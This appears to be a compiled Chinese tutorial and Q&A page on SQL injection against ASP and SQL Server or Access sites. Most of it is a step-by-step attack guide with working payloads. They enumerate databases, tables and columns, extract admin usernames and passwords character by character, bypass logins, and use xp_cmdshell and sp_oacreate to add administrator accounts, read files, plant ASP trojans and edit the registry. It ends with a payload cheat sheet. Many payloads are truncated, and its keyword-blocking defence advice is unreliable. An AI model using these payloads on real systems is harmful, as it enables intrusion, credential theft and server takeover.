sql注入特徵_什麼是SQL注入

㈠什麼是sql注入

SQL注入：利用現有應用程序，將(惡意)的SQL命令注入到後台資料庫引擎執行的能力，這是SQL注入的標准釋義。
隨著B/S模式被廣泛的應用，用這種模式編寫應用程序的程序員也越來越多，但由於開發人員的水平和經驗參差不齊，相當一部分的開發人員在編寫代碼的時候，沒有對用戶的輸入數據或者是頁面中所攜帶的信息（如Cookie）進行必要的合法性判斷，導致了攻擊者可以提交一段資料庫查詢代碼，根據程序返回的結果，獲得一些他想得到的數據。

SQL注入利用的是正常的HTTP服務埠，表面上看來和正常的web訪問沒有區別，隱蔽性極強，不易被發現。
SQL注入攻擊過程分為五個步驟：
第一步：判斷Web環境是否可以SQL注入。如果URL僅是對網頁的訪問，不存在SQL注入問題，如：http://www.../162414739931.shtml就是普通的網頁訪問。只有對資料庫進行動態查詢的業務才可能存在SQL注入，如：http://www...../webhp?id＝39，其中?id＝39表示資料庫查詢變數，這種語句會在資料庫中執行，因此可能會給資料庫帶來威脅。
第二步：尋找SQL注入點。完成上一步的片斷後，就要尋找可利用的注入漏洞，通過輸入一些特殊語句，可以根據瀏覽器返回信息，判斷資料庫類型，從而構建資料庫查詢語句找到注入點。

第三步：猜解用戶名和密碼。資料庫中存放的表名、欄位名都是有規律可言的。通過構建特殊資料庫語句在資料庫中依次查找表名、欄位名、用戶名和密碼的長度，以及內容。這個猜測過程可以通過網上大量注入工具快速實現，並藉助破解網站輕易破譯用戶密碼。

第四步：尋找WEB管理後台入口。通常WEB後台管理的界面不面向普通用戶

開放，要尋找到後台的登陸路徑，可以利用掃描工具快速搜索到可能的登陸地址，依次進行嘗試，就可以試出管理台的入口地址。

第五步：入侵和破壞。成功登陸後台管理後，接下來就可以任意進行破壞行為，如篡改網頁、上傳木馬、修改、泄漏用戶信息等，並進一步入侵資料庫伺服器。
SQL注入攻擊的特點:

變種極多，有經驗的攻擊者會手動調整攻擊參數，致使攻擊數據的變種是不可枚舉的，這導致傳統的特徵匹配檢測方法僅能識別相當少的攻擊，難以防範。

攻擊過程簡單，目前互聯網上流行眾多的SQL注入攻擊工具，攻擊者藉助這些工具可很快對目標WEB系統實施攻擊和破壞。

危害大，由於WEB編程語言自身的缺陷以及具有安全編程能力的開發人員少之又少，大多數WEB業務系統均具有被SQL注入攻擊的可能。而攻擊者一旦攻擊成功，可以對控制整個WEB業務系統，對數據做任意的修改，破壞力達到及至。

SQL注入的危害和現狀

SQL注入的主要危害包括：

未經授權狀況下操作資料庫中的數據

惡意篡改網頁內容

私自添加系統帳號或者是資料庫使用者帳號

網頁掛木馬

如何防止SQL參數：
1，檢查上傳的數據，並過濾
2. 禁止拼接SQL字元串
3.使用SQL參數化處理
4．載入防入侵等硬體設施

㈡資料庫防火牆如何防範SQL注入行為

Safe3的WEB防火牆可以的

㈢代碼注入的特徵

SQL注入是從正常的WWW埠訪問，而且表面看起來跟一般的Web頁面訪問沒什麼區別，所以目前市面的防火牆都不會對SQL注入發出警報，如果管理員沒查看IIS日誌的習慣，可能被入侵很長時間都不會發覺。但是，SQL注入的手法相當靈活，在注入的時候會碰到很多意外的情況。能不能根據具體情況進行分析，構造巧妙的SQL語句，從而成功獲取想要的數據。
據統計，網站用ASP+Access或SQLServer的佔70%以上，PHP+MySQL佔20%，其他的不足10%。在本文，以SQL-SERVER+ASP例說明SQL注入的原理、方法與過程。（PHP注入的文章由NB聯盟的另一位朋友zwell撰寫的有關文章）
SQL注入攻擊的總體思路是：
l 發現SQL注入位置；
l 判斷後台資料庫類型；
l 確定XP_CMDSHELL可執行情況
l 發現WEB虛擬目錄
l 上傳ASP木馬；
l 得到管理員許可權；
一、SQL注入漏洞的判斷
一般來說，SQL注入一般存在於形如：HTTP://xxx.xxx.xxx/abc.asp?id=XX等帶有參數的ASP動態網頁中，有時一個動態網頁中可能只有一個參數，有時可能有N個參數，有時是整型參數，有時是字元串型參數，不能一概而論。總之只要是帶有參數的動態網頁且此網頁訪問了資料庫，那麼就有可能存在SQL注入。如果ASP程序員沒有安全意識，不進行必要的字元過濾，存在SQL注入的可能性就非常大。
為了全面了解動態網頁回答的信息，首選請調整IE的配置。把IE菜單-工具-Internet選項－高級－顯示友好HTTP錯誤信息前面的勾去掉。
為了把問題說明清楚，以下以HTTP://xxx.xxx.xxx/abc.asp?p=YY為例進行分析，YY可能是整型，也有可能是字元串。
1、整型參數的判斷
當輸入的參數YY為整型時，通常abc.asp中SQL語句原貌大致如下：
select * from 表名 where 欄位=YY，所以可以用以下步驟測試SQL注入是否存在。
①HTTP://xxx.xxx.xxx/abc.asp?p=YY'(附加一個單引號)，此時abc.ASP中的SQL語句變成了
select * from 表名 where 欄位=YY'，abc.asp運行異常；
②HTTP://xxx.xxx.xxx/abc.asp?p=YY and 1=1, abc.asp運行正常，而且與HTTP://xxx.xxx.xxx/abc.asp?p=YY運行結果相同；
③HTTP://xxx.xxx.xxx/abc.asp?p=YY and 1=2, abc.asp運行異常；
如果以上三步全面滿足，abc.asp中一定存在SQL注入漏洞。
2、字元串型參數的判斷
當輸入的參數YY為字元串時，通常abc.asp中SQL語句原貌大致如下：
select * from 表名 where 欄位='YY'，所以可以用以下步驟測試SQL注入是否存在。
①HTTP://xxx.xxx.xxx/abc.asp?p=YY'(附加一個單引號)，此時abc.ASP中的SQL語句變成了
select * from 表名 where 欄位=YY'，abc.asp運行異常；
②HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb ... 39;1'='1', abc.asp運行正常，而且與HTTP://xxx.xxx.xxx/abc.asp?p=YY運行結果相同；
③HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb ... 39;1'='2', abc.asp運行異常；
如果以上三步全面滿足，abc.asp中一定存在SQL注入漏洞。
3、特殊情況的處理
有時ASP程序員會在程序員過濾掉單引號等字元，以防止SQL注入。此時可以用以下幾種方法試一試。
①大小定混合法：由於VBS並不區分大小寫，而程序員在過濾時通常要麼全部過濾大寫字元串，要麼全部過濾小寫字元串，而大小寫混合往往會被忽視。如用SelecT代替select,SELECT等；
②UNICODE法：在IIS中，以UNICODE字元集實現國際化，我們完全可以IE中輸入的字元串化成UNICODE字元串進行輸入。如+ =%2B，空格=%20 等；URLEncode信息參見附件一；
③ASCII碼法：可以把輸入的部分或全部字元全部用ASCII碼代替，如U=chr(85),a=chr(97)等，ASCII信息參見附件二；
二、區分資料庫伺服器類型
一般來說，ACCESS與SQL－SERVER是最常用的資料庫伺服器，盡管它們都支持T－SQL標准，但還有不同之處，而且不同的資料庫有不同的攻擊方法，必須要區別對待。
1、利用資料庫伺服器的系統變數進行區分
SQL－SERVER有user,db_name()等系統變數，利用這些系統值不僅可以判斷SQL-SERVER，而且還可以得到大量有用信息。如：
① HTTP://xxx.xxx.xxx/abc.asp?p=YY and user>0 不僅可以判斷是否是SQL-SERVER，而還可以得到當前連接到資料庫的用戶名
②HTTP://xxx.xxx.xxx/abc.asp?p=YY&n ... db_name()>0 不僅可以判斷是否是SQL-SERVER，而還可以得到當前正在使用的資料庫名；
2、利用系統表
ACCESS的系統表是msysobjects,且在WEB環境下沒有訪問許可權，而SQL-SERVER的系統表是sysobjects,在WEB環境下有訪問許可權。對於以下兩條語句：
①HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from sysobjects)>0
②HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from msysobjects)>0
若資料庫是SQL-SERVE，則第一條，abc.asp一定運行正常，第二條則異常；若是ACCESS則兩條都會異常。
3、 MSSQL三個關鍵系統表
sysdatabases系統表：Microsoft SQL Server 上的每個資料庫在表中佔一行。最初安裝 SQL Server 時，sysdatabases 包含 master、model、msdb、mssqlweb 和 tempdb 資料庫的項。該表只存儲在 master 資料庫中。這個表保存在master資料庫中，這個表中保存的是什麼信息呢？這個非常重要。他是保存了所有的庫名,以及庫的ID和一些相關信息。
這里我把對於我們有用的欄位名稱和相關說明給大家列出來。name //表示庫的名字。
dbid //表示庫的ID，dbid從1到5是系統的。分別是：master、model、msdb、mssqlweb、tempdb 這五個庫。用select * from master.dbo.sysdatabases 就可以查詢出所有的庫名。
Sysobjects：SQL-SERVER的每個資料庫內都有此系統表，它存放該資料庫內創建的所有對象，如約束、默認值、日誌、規則、存儲過程等，每個對象在表中佔一行。以下是此系統表的欄位名稱和相關說明。
Name，id，xtype，uid，status：分別是對象名，對象ID，對象類型，所有者對象的用戶ID,對象狀態。
對象類型(xtype)。可以是下列對象類型中的一種：
C = CHECK 約束
D = 默認值或 DEFAULT 約束
F = FOREIGN KEY 約束
L = 日誌
FN = 標量函數
IF = 內嵌表函數
P = 存儲過程
PK = PRIMARY KEY 約束（類型是 K）
RF = 復制篩選存儲過程
S = 系統表
TF = 表函數
TR = 觸發器
U = 用戶表
UQ = UNIQUE 約束（類型是 K）
V = 視圖
X = 擴展存儲過程
當xtype='U' and status>0代表是用戶建立的表，對象名就是表名，對象ID就是表的ID值。
用: select * from ChouYFD.dbo.sysobjects where xtype='U' and status>0 就可以列出庫ChouYFD中所有的用戶建立的表名。
syscolumns ：每個表和視圖中的每列在表中佔一行，存儲過程中的每個參數在表中也佔一行。該表位於每個資料庫中。主要欄位有：
name ，id， colid ：分別是欄位名稱，表ID號，欄位ID號，其中的 ID 是剛上我們用sysobjects得到的表的ID號。
用: select * from ChouYFD.dbo.syscolumns where id=123456789 得到ChouYFD這個庫中，表的ID是123456789中的所有欄位列表。
三、確定XP_CMDSHELL可執行情況
若當前連接數據的帳號具有SA許可權，且master.dbo.xp_cmdshell擴展存儲過程(調用此存儲過程可以直接使用操作系統的shell)能夠正確執行，則整個計算機可以通過以下幾種方法完全控制，以後的所有步驟都可以省
1、HTTP://xxx.xxx.xxx/abc.asp?p=YY&nb ... er>0 abc.asp執行異常但可以得到當前連接資料庫的用戶名(若顯示dbo則代表SA)。
2、HTTP://xxx.xxx.xxx/abc.asp?p=YY ... me()>0 abc.asp執行異常但可以得到當前連接的資料庫名。
3、HTTP://xxx.xxx.xxx/abc.asp?p=YY；exec master..xp_cmdshell net user aaa bbb /add-- (master是SQL-SERVER的主資料庫；名中的分號表示SQL-SERVER執行完分號前的語句名，繼續執行其後面的語句；—號是註解，表示其後面的所有內容僅為注釋，系統並不執行)可以直接增加操作系統帳戶aaa,密碼為bbb。
4、HTTP://xxx.xxx.xxx/abc.asp?p=YY；exec master..xp_cmdshell net localgroup administrators aaa /add-- 把剛剛增加的帳戶aaa加到administrators組中。
5、HTTP://xxx.xxx.xxx/abc.asp?p=YY；backuup database 資料庫名 to disk='c:inetpubwwwrootsave.db' 則把得到的數據內容全部備份到WEB目錄下，再用HTTP把此文件下載(當然首選要知道WEB虛擬目錄)。
6、通過復制CMD創建UNICODE漏洞
HTTP://xxx.xxx.xxx/abc.asp?p=YY;exe ... dbo.xp_cmdshell c:winntsystem32cmd.exe c:inetpubscriptscmd.exe 便製造了一個UNICODE漏洞，通過此漏洞的利用方法，便完成了對整個計算機的控制(當然首選要知道WEB虛擬目錄)。
四、發現WEB虛擬目錄
只有找到WEB虛擬目錄，才能確定放置ASP木馬的位置，進而得到USER許可權。有兩種方法比較有效。
一是根據經驗猜解，一般來說，WEB虛擬目錄是：c:inetpubwwwroot; D:inetpubwwwroot; E:inetpubwwwroot等，而可執行虛擬目錄是：c:inetpubscripts; D:inetpubscripts; E:inetpubscripts等。
二是遍歷系統的目錄結構，分析結果並發現WEB虛擬目錄；
先創建一個臨時表：temp
HTTP://xxx.xxx.xxx/abc.asp?p=YY;create&n ... mp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
接下來：
（1）我們可以利用xp_availablemedia來獲得當前所有驅動器,並存入temp表中：
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert temp ... ter.dbo.xp_availablemedia;--
我們可以通過查詢temp的內容來獲得驅動器列表及相關信息
（2）我們可以利用xp_subdirs獲得子目錄列表,並存入temp表中：
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(i ... dbo.xp_subdirs 'c:';--
（3）我們還可以利用xp_dirtree獲得所有子目錄的目錄樹結構,並寸入temp表中：
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:';--
這樣就可以成功的瀏覽到所有的目錄（文件夾）列表：
如果我們需要查看某個文件的內容，可以通過執行xp_cmdsell：
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id) exec ... nbsp;'type c:webindex.asp';--
使用'bulk insert'語法可以將一個文本文件插入到一個臨時表中。如：bulk insert temp(id) from 'c:inetpubwwwrootindex.asp'
瀏覽temp就可以看到index.asp文件的內容了！通過分析各種ASP文件，可以得到大量系統信息，WEB建設與管理信息，甚至可以得到SA帳號的連接密碼。
當然，如果xp_cmshell能夠執行，我們可以用它來完成：
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id)&nbs ... cmdshell 'dir c:';--
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id)&n ... p_cmdshell 'dir c: *.asp /s/a';--
通過xp_cmdshell我們可以看到所有想看到的，包括W3svc
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id) exec master.dbo.xp_cmdshe ... ubAdminScriptsadsutil.vbs enum w3svc'
但是，如果不是SA許可權，我們還可以使用
HTTP://xxx.xxx.xxx/abc.asp?p=YY;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:';--
注意：
1、以上每完成一項瀏覽後，應刪除TEMP中的所有內容，刪除方法是：
HTTP://xxx.xxx.xxx/abc.asp?p=YY;delete from temp;--
2、瀏覽TEMP表的方法是：(假設TestDB是當前連接的資料庫名)
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top& ... nbsp;TestDB.dbo.temp )>0 得到表TEMP中第一條記錄id欄位的值，並與整數進行比較，顯然abc.asp工作異常，但在異常中卻可以發現id欄位的值。假設發現的表名是xyz，則
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 id from ... ere id not in('xyz'))>0 得到表TEMP中第二條記錄id欄位的值。
五、上傳ASP木馬
所謂ASP木馬，就是一段有特殊功能的ASP代碼，並放入WEB虛擬目錄的Scripts下，遠程客戶通過IE就可執行它，進而得到系統的USER許可權，實現對系統的初步控制。上傳ASP木馬一般有兩種比較有效的方法：
1、利用WEB的遠程管理功能
許多WEB站點，為了維護的方便，都提供了遠程管理的功能；也有不少WEB站點，其內容是對於不同的用戶有不同的訪問許可權。為了達到對用戶許可權的控制，都有一個網頁，要求用戶名與密碼，只有輸入了正確的值，才能進行下一步的操作,可以實現對WEB的管理，如上傳、下載文件，目錄瀏覽、修改配置等。
因此，若獲取正確的用戶名與密碼，不僅可以上傳ASP木馬，有時甚至能夠直接得到USER許可權而瀏覽系統，上一步的發現WEB虛擬目錄的復雜操作都可省略。
用戶名及密碼一般存放在一張表中，發現這張表並讀取其中內容便解決了問題。以下給出兩種有效方法。
A、注入法：
從理論上說，認證網頁中會有型如：
select * from admin where username='XXX' and password='YYY' 的語句，若在正式運行此句之前，沒有進行必要的字元過濾，則很容易實施SQL注入。
如在用戶名文本框內輸入：abc' or 1=1-- 在密碼框內輸入：123 則SQL語句變成：
select * from admin where username='abc' or 1=1 and password='123' 不管用戶輸入任何用戶名與密碼，此語句永遠都能正確執行，用戶輕易騙過系統，獲取合法身份。
B、猜解法：
基本思路是：猜解所有資料庫名稱，猜出庫中的每張表名，分析可能是存放用戶名與密碼的表名，猜出表中的每個欄位名，猜出表中的每條記錄內容。
l 猜解所有資料庫名稱
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from master.dbo.sysdatabases where name>1 and dbid=6) <>0 因為 dbid 的值從1到5，是系統用了。所以用戶自己建的一定是從6開始的。並且我們提交了 name>1 (name欄位是一個字元型的欄位和數字比較會出錯),abc.asp工作異常，可得到第一個資料庫名，同理把DBID分別改成7,8，9,10,11,12...就可得到所有資料庫名。
以下假設得到的資料庫名是TestDB。
l 猜解資料庫中用戶名表的名稱
猜解法：此方法就是根據個人的經驗猜表名，一般來說，user,users,member,members,userlist,memberlist,userinfo,manager,admin,adminuser,systemuser,systemusers,sysuser,sysusers,sysaccounts,systemaccounts等。並通過語句進行判斷
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(*) from TestDB.dbo.表名)>0 若表名存在，則abc.asp工作正常，否則異常。如此循環，直到猜到系統帳號表的名稱。
讀取法：SQL-SERVER有一個存放系統核心信息的表sysobjects，有關一個庫的所有表，視圖等信息全部存放在此表中，而且此表可以通過WEB進行訪問。
當xtype='U' and status>0代表是用戶建立的表，發現並分析每一個用戶建立的表及名稱，便可以得到用戶名表的名稱，基本的實現方法是：
①HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 name from TestD ... type='U' and status>0 )>0 得到第一個用戶建立表的名稱，並與整數進行比較，顯然abc.asp工作異常，但在異常中卻可以發現表的名稱。假設發現的表名是xyz，則
②HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 name from TestDB.dbo.sysobjects& ... tatus>0 and name not in('xyz'))>0 可以得到第二個用戶建立的表的名稱，同理就可得到所有用建立的表的名稱。
根據表的名稱，一般可以認定那張表用戶存放用戶名及密碼，以下假設此表名為Admin。
l 猜解用戶名欄位及密碼欄位名稱
admin表中一定有一個用戶名欄位，也一定有一個密碼欄位，只有得到此兩個欄位的名稱，才有可能得到此兩欄位的內容。如何得到它們的名稱呢，同樣有以下兩種方法。
猜解法：此方法就是根據個人的經驗猜欄位名，一般來說，用戶名欄位的名稱常用：username,name,user,account等。而密碼欄位的名稱常用：password,pass,pwd,passwd等。並通過語句進行判斷
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select count(欄位名) from TestDB.dbo.admin)>0 select count(欄位名) from 表名語句得到表的行數，所以若欄位名存在，則abc.asp工作正常，否則異常。如此循環，直到猜到兩個欄位的名稱。
讀取法：基本的實現方法是
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select ... me(object_id('admin'),1) from TestDB.dbo.sysobjects)>0 。select top 1 col_name(object_id('admin'),1) from TestDB.dbo.sysobjects是從sysobjects得到已知表名的第一個欄位名，當與整數進行比較，顯然abc.asp工作異常，但在異常中卻可以發現欄位的名稱。把col_name(object_id('admin'),1)中的1依次換成2,3,4,5，6...就可得到所有的欄位名稱。
l 猜解用戶名與密碼
猜用戶名與密碼的內容最常用也是最有效的方法有：
ASCII碼逐字解碼法:雖然這種方法速度較慢，但肯定是可行的。基本的思路是先猜出欄位的長度，然後依次猜出每一位的值。猜用戶名與猜密碼的方法相同，以下以猜用戶名為例說明其過程。
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top&n ... nbsp;from TestDB.dbo.admin)=X(X=1,2，3,4，5，... n，username為用戶名欄位的名稱，admin為表的名稱)，若x為某一值i且abc.asp運行正常時，則i就是第一個用戶名的長度。如：當輸入
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top ... e) from TestDB.dbo.admin)=8時abc.asp運行正常，則第一個用戶名的長度為8
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring(username,m,1)) from TestDB.dbo.admin)=n (m的值在1到上一步得到的用戶名長度之間，當m=1，2,3，...時猜測分別猜測第1,2,3,...位的值；n的值是1~9、a~z、A~Z的ASCII值，也就是1~128之間的任意值；admin為系統用戶帳號表的名稱)，若n為某一值i且abc.asp運行正常時，則i對應ASCII碼就是用戶名某一位值。如：當輸入
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring(username,3,1)) from TestDB.dbo.admin)=80時abc.asp運行正常，則用戶名的第三位為P(P的ASCII為80)；
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (sel ... ascii(substring(username,9,1)) from TestDB.dbo.admin)=33時abc.asp運行正常，則用戶名的第9位為!(!的ASCII為33)；
猜到第一個用戶名及密碼後，同理，可以猜出其他所有用戶名與密碼。注意：有時得到的密碼可能是經MD5等方式加密後的信息，還需要用專用工具進行脫密。或者先改其密碼，使用完後再改回來，見下面說明。
簡單法：猜用戶名用
HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1 ... o.admin where username>1) , flag是admin表中的一個欄位，username是用戶名欄位，此時abc.asp工作異常，但能得到Username的值。與上同樣的方法，可以得到第二用戶名，第三個用戶等等，直到表中的所有用戶名。
猜用戶密碼：HTTP://xxx.xxx.xxx/abc.asp?p=YY and (select top 1&nb ... B.dbo.admin where pwd>1) , flag是admin表中的一個欄位，pwd是密碼欄位，此時abc.asp工作異常，但能得到pwd的值。與上同樣的方法，可以得到第二用戶名的密碼，第三個用戶的密碼等等，直到表中的所有用戶的密碼。密碼有時是經MD5加密的，可以改密碼。
HTTP://xxx.xxx.xxx/abc.asp?p=YY;update TestDB.dbo.admin set pwd=' ... where username='www';-- ( 1的MD5值為：AAABBBCCCDDDEEEF，即把密碼改成1；www為已知的用戶名)
用同樣的方法當然可把密碼改原來的值。
2、利用表內容導成文件功能
SQL有BCP命令，它可以把表的內容導成文本文件並放到指定位置。利用這項功能，我們可以先建一張臨時表，然後在表中一行一行地輸入一個ASP木馬，然後用BCP命令導出形成ASP文件。
命令行格式如下：
bcp select * from text..foo queryout c:inetpubwwwroot uncommand.asp -c -S localhost -U sa -P foobar ('S'參數為執行查詢的伺服器，'U'參數為用戶名，'P'參數為密碼，最終上傳了一個runcommand.asp的木馬)
六、得到系統的管理員許可權
ASP木馬只有USER許可權，要想獲取對系統的完全控制，還要有系統的管理員許可權。怎麼辦？提升許可權的方法有很多種：
上傳木馬，修改開機自動運行的.ini文件(它一重啟，便死定了)；
復制CMD.exe到scripts，人為製造UNICODE漏洞；
下載SAM文件，破解並獲取OS的所有用戶名密碼；
等等，視系統的具體情況而定，可以採取不同的方法。
七、幾個SQL-SERVER專用手段
1、利用xp_regread擴展存儲過程修改注冊表
[xp_regread]另一個有用的內置存儲過程是xp_regXXXX類的函數集合(Xp_regaddmultistring，Xp_regdeletekey，Xp_regdeletevalue，Xp_regenumkeys，Xp_regenumvalues，Xp_regread，Xp_regremovemultistring，Xp_regwrite)。攻擊者可以利用這些函數修改注冊表，如讀取SAM值，允許建立空連接，開機自動運行程序等。如：
exec xp_regread HKEY_LOCAL_MACHINE,'', 'nullsessionshares' 確定什麼樣的會話連接在伺服器可用。
exec xp_regenumvalues HKEY_LOCAL_MACHINE,'' 顯示伺服器上所有SNMP團體配置，有了這些信息，攻擊者或許會重新配置同一網路中的網路設備。
2、利用其他存儲過程去改變伺服器
xp_servicecontrol過程允許用戶啟動，停止服務。如：
(exec master..xp_servicecontrol 'start','schele'
exec master..xp_servicecontrol 'start','server')
Xp_availablemedia 顯示機器上有用的驅動器
Xp_dirtree 允許獲得一個目錄樹
Xp_enumdsn 列舉伺服器上的ODBC數據源
Xp_loginconfig 獲取伺服器安全信息
Xp_makecab 允許用戶在伺服器上創建一個壓縮文件
Xp_ntsec_enumdomains 列舉伺服器可以進入的域
Xp_terminate_process 提供進程的進程ID，終止此進程
附件一：URLUnicode表(節選,主要是非字母的字元，RFC1738)
字元特殊字元的含義 URL編碼
# 用來標志特定的文檔位置 %23
% 對特殊字元進行編碼 %25
& 分隔不同的變數值對 %26
+ 在變數值中表示空格 %2B
/ 表示目錄路徑 %2F
%5C
= 用來連接鍵和值 %3D
? 表示查詢字元串的開始 %3F
空格 %20
. 句號 %2E
：冒號 %3A
附件二：ASCII表(節選)
Dec Hex Char Dec Hex Char
80 50 P
32 20 (space) 81 51 Q
33 21 ! 82 52 R
34 22 83 53 S
35 23 # 84 54 T
36 24 $Content$nbsp; 85 55 U
37 25 % 86 56 V
38 26 & 87 57 W
39 27 ' 88 58 X
40 28 ( 89 59 Y
41 29 ) 90 5A Z
42 2A * 91 5B [
43 2B + 92 5C
44 2C , 93 5D ]
45 2D - 94 5E ^
46 2E . 95 5F _
47 2F / 96 60 `
48 30 0 97 61 a
49 31 1 98 62 b
50 32 2 99 63 c
51 33 3 100 64 d
52 34 4
53 35 5 101 65 e
54 36 6 102 66 f
55 37 7 103 67 g
56 38 8 104 68 h
57 39 9 105 69 i
58 3A : 106 6A j
59 3B ; 107 6B k
60 3C < 108 6C l
61 3D = 109 6D m
62 3E > 110 6E n
63 3F ? 111 6F o
112 70 p
64 40 @ 113 72 q
65 41 A 114 72 r
66 42 B 115 73 s
67 43 C 116 74 t
68 44 D 117 75 u
69 45 E 118 76 v
70 46 F 119 77 w
71 47 G 120 78 x
72 48 H 121 79 y
73 49 I 122 7A z
74 4A J 123 7B {
75 4B K 124 7C |
76 4C L 125 7D }
77 4D M 126 7E ~
78 4E N 127 7F €
79 4F O 128 80

㈣高分求助，sql 注入，高手請進

SQL注入就是利用SQL的語言特徵來使SQL條件無效而已。
舉個例子：
你登錄檢驗的SQL代碼是：
Select * Form User_DB where ID='你輸入的ID' and PAS ='你輸入的密碼'；
你知道一個人的ID但是不知道他的密碼，可是你很想用他的密碼來登錄，怎麼辦呢？你可以輸入他的ID，比如是0001。之後你再密碼那一欄填寫： aa' or 'a'='a
這樣你得到的SQL語句就是這樣的了：
Select * Form User_DB where ID='0001' and PAS ='aa' or 'a'='a'；
雖然你寫的密碼是不符合標準的，但是條件多了一個「或者'a'='a'」，這個條件是永真的（意思就是說這個條件永遠成立），那麼你之前寫了一萬個條件只要有這么一個條件就全白搭。這樣你就進去了。這就是最簡單的SQL注入。

防止它也相當簡單，就是在對庫操作的時候禁止用戶輸入 and,or.....等等SQL關鍵字就好……網上查SQL防注入一大堆。

㈤ sql注入的語句特徵

1.判斷有無注入點
; and 1=1 and 1=2
2.猜表一般的表的名稱無非是admin adminuser user pass password 等..
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) ---判斷是否存在admin這張表
3.猜帳號數目如果遇到0< 返回正確頁面， 1<返回錯誤頁面，說明帳號數目就是1個
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
4.猜解欄位名稱在len( ) 括弧裡面加上我們想到的欄位名稱.
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len（用戶欄位名稱name)>0)
and 1=(select count(*) from admin where len（密碼欄位名稱password)>0)
5.猜解各個欄位的長度猜解長度就是把>0變換直到返回正確頁面為止
and 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6) 錯誤
and 1=(select count(*) from admin where len(name)>5) 正確長度是6
and 1=(select count(*) from admin where len(name)=6) 正確
and 1=(select count(*) from admin where len(password)>11) 正確
and 1=(select count(*) from admin where len(password)>12) 錯誤長度是12
and 1=(select count(*) from admin where len(password)=12) 正確
6.猜解字元
and 1=(select count(*) from admin where left(name,1)=a) ---猜解用戶帳號的第一位
and 1=(select count(*) from admin where left(name,2)=ab)---猜解用戶帳號的第二位
就這樣一次加一個字元這樣猜，猜到夠你剛才猜出來的多少位了就對了，帳號就算出來了
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
這個查詢語句可以猜解中文的用戶和密碼.只要把後面的數字換成中文的ASSIC碼就OK.最後把結果再轉換成字元.
group by users. id having 1=1--
group by users. id,users.username,users.password,users.privs having 1=1--
; insert into users values( 666,attacker,foobar,0xffff )--
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable-
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE COLUMN_NAME NOT IN
(login_id)-
UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE COLUMN_NAME NOT IN
(login_id,login_name)-
UNION SELECT TOP 1 login_name FROM logintable-
UNION SELECT TOP 1 password FROM logintable where login_name=Rahul--
看伺服器打的補丁=出錯了打了SP4補丁
and 1=(select @@VERSION)--
看資料庫連接賬號的許可權，返回正常，證明是伺服器角色sysadmin許可權。
and 1=(SELECT IS_SRVROLEMEMBER(sysadmin))--
判斷連接資料庫帳號。（採用SA賬號連接返回正常=證明了連接賬號是SA）
and sa=(SELECT System_user)--
and user_name()=dbo--
and 0<>(select user_name()--
看xp_cmdshell是否刪除
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)--
xp_cmdshell被刪除，恢復，支持絕對路徑的恢復
;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll--
;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:inetpubwwwrootxplog70.dll--
反向PING自己實驗
;use master;declare @s int;exec sp_oacreate wscript.shell,@s out;exec sp_oamethod @s,run,NULL,cmd.exe /c ping 192.168.0.1;--
加帳號
;DECLARE @shell INT EXEC SP_OACREATEwscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null,C:WINNTsystem32cmd.exe
/c net user jiaoniang$ 1866574 /add--
創建一個虛擬目錄E盤：
;declare @o int exec sp_oacreatewscript.shell,@o out exec sp_oamethod @o,run,NULL,cscript.exec:inetpubwwwrootmkwebdir.vbs -w 默認Web站點 -v e,e：--
訪問屬性：（配合寫入一個webshell）
declare @o int exec sp_oacreate wscript.shell,@o out exec sp_oamethod @o,run,NULL,cscript.exec:inetpubwwwrootchaccess.vbs -a w3svc/1/ROOT/e +browse
爆庫特殊技巧：：%5c= 或者把/和修改%5提交
and 0<>(select top 1 paths from newtable)--
得到庫名（從1到5都是系統的id，6以上才可以判斷）
and 1=(select name from master.dbo.sysdatabases where dbid=7)--
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
依次提交 dbid = 7,8,9.... 得到更多的資料庫名
and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=U) 暴到一個表假設為 admin
